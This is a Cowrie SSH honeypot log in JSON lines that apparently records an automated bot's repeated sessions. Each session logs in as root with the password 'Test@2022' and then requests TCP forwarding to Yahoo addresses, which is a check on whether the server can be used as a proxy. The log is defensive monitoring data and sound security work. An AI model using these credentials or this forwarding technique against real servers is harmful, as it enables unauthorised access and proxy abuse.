{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29553,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c818bfa5e56","protocol":"ssh","message":"New connection: 213.209.150.239:29553 (1.2.3.4:22) [session: 8c818bfa5e56]","sensor":"my-vps","timestamp":"2025-08-26T01:04:02.023830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:02.033133Z","src_ip":"213.209.150.239","session":"8c818bfa5e56"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:02.070984Z","src_ip":"213.209.150.239","session":"8c818bfa5e56"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:02.305822Z","src_ip":"213.209.150.239","session":"8c818bfa5e56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":18158,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:18158","sensor":"my-vps","timestamp":"2025-08-26T01:04:02.354768Z","session":"8c818bfa5e56"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:02.401923Z","src_ip":"213.209.150.239","session":"8c818bfa5e56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":8131,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:8131","sensor":"my-vps","timestamp":"2025-08-26T01:04:02.537388Z","session":"8c818bfa5e56"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:02.584461Z","src_ip":"213.209.150.239","session":"8c818bfa5e56"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:02.632644Z","src_ip":"213.209.150.239","session":"8c818bfa5e56"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29597,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad5179b8c7ba","protocol":"ssh","message":"New connection: 213.209.150.239:29597 (1.2.3.4:22) [session: ad5179b8c7ba]","sensor":"my-vps","timestamp":"2025-08-26T01:04:02.679090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:02.679977Z","src_ip":"213.209.150.239","session":"ad5179b8c7ba"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:02.727682Z","src_ip":"213.209.150.239","session":"ad5179b8c7ba"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:02.963298Z","src_ip":"213.209.150.239","session":"ad5179b8c7ba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":8556,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:8556","sensor":"my-vps","timestamp":"2025-08-26T01:04:03.011851Z","session":"ad5179b8c7ba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:03.059563Z","src_ip":"213.209.150.239","session":"ad5179b8c7ba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":10296,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:10296","sensor":"my-vps","timestamp":"2025-08-26T01:04:03.197964Z","session":"ad5179b8c7ba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:03.245353Z","src_ip":"213.209.150.239","session":"ad5179b8c7ba"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:03.293299Z","src_ip":"213.209.150.239","session":"ad5179b8c7ba"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29644,"dst_ip":"1.2.3.4","dst_port":22,"session":"79b73680a355","protocol":"ssh","message":"New connection: 213.209.150.239:29644 (1.2.3.4:22) [session: 79b73680a355]","sensor":"my-vps","timestamp":"2025-08-26T01:04:03.339444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:03.340559Z","src_ip":"213.209.150.239","session":"79b73680a355"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:03.387658Z","src_ip":"213.209.150.239","session":"79b73680a355"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:03.622594Z","src_ip":"213.209.150.239","session":"79b73680a355"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":17581,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:17581","sensor":"my-vps","timestamp":"2025-08-26T01:04:03.670758Z","session":"79b73680a355"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:03.718127Z","src_ip":"213.209.150.239","session":"79b73680a355"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":2771,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:2771","sensor":"my-vps","timestamp":"2025-08-26T01:04:03.853596Z","session":"79b73680a355"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:03.900728Z","src_ip":"213.209.150.239","session":"79b73680a355"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:03.950353Z","src_ip":"213.209.150.239","session":"79b73680a355"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29694,"dst_ip":"1.2.3.4","dst_port":22,"session":"a35f40b7187b","protocol":"ssh","message":"New connection: 213.209.150.239:29694 (1.2.3.4:22) [session: a35f40b7187b]","sensor":"my-vps","timestamp":"2025-08-26T01:04:04.005862Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:04.007146Z","src_ip":"213.209.150.239","session":"a35f40b7187b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:04.063883Z","src_ip":"213.209.150.239","session":"a35f40b7187b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:04.345574Z","src_ip":"213.209.150.239","session":"a35f40b7187b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":18655,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:18655","sensor":"my-vps","timestamp":"2025-08-26T01:04:04.403057Z","session":"a35f40b7187b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:04.459682Z","src_ip":"213.209.150.239","session":"a35f40b7187b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":18509,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:18509","sensor":"my-vps","timestamp":"2025-08-26T01:04:04.614998Z","session":"a35f40b7187b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:04.671722Z","src_ip":"213.209.150.239","session":"a35f40b7187b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:04.729084Z","src_ip":"213.209.150.239","session":"a35f40b7187b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29757,"dst_ip":"1.2.3.4","dst_port":22,"session":"69850917fcc4","protocol":"ssh","message":"New connection: 213.209.150.239:29757 (1.2.3.4:22) [session: 69850917fcc4]","sensor":"my-vps","timestamp":"2025-08-26T01:04:04.775276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:04.776238Z","src_ip":"213.209.150.239","session":"69850917fcc4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:04.823488Z","src_ip":"213.209.150.239","session":"69850917fcc4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:05.058757Z","src_ip":"213.209.150.239","session":"69850917fcc4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":5284,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:5284","sensor":"my-vps","timestamp":"2025-08-26T01:04:05.107377Z","session":"69850917fcc4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:05.154655Z","src_ip":"213.209.150.239","session":"69850917fcc4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":23926,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:23926","sensor":"my-vps","timestamp":"2025-08-26T01:04:05.289537Z","session":"69850917fcc4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:05.336762Z","src_ip":"213.209.150.239","session":"69850917fcc4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:05.384840Z","src_ip":"213.209.150.239","session":"69850917fcc4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29793,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd93ab1b0789","protocol":"ssh","message":"New connection: 213.209.150.239:29793 (1.2.3.4:22) [session: dd93ab1b0789]","sensor":"my-vps","timestamp":"2025-08-26T01:04:05.440442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:05.441235Z","src_ip":"213.209.150.239","session":"dd93ab1b0789"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-c